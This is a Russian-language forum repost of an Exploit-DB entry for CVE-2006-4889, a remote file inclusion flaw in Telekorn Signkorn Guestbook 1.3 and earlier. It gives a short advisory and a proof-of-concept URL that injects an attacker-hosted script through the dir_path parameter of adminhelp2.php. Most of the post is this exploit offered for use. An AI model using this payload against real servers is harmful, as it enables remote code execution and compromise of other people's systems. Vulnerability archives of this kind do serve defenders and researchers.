Exploit Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp2.php?dir_path' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
28534
Проверка EDB
  1. Пройдено
Автор
THE_LEO
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-4889
Дата публикации
2006-09-12
Код:
source: https://www.securityfocus.com/bid/19977/info
            
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
            
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
            
Versions 1.3 and earlier are affected by this issue.

http://www.example.Com/[Script]/help/de/adminhelp2.php?dir_path=[U r Evil Script] ;
 
Источник
www.exploit-db.com

Похожие темы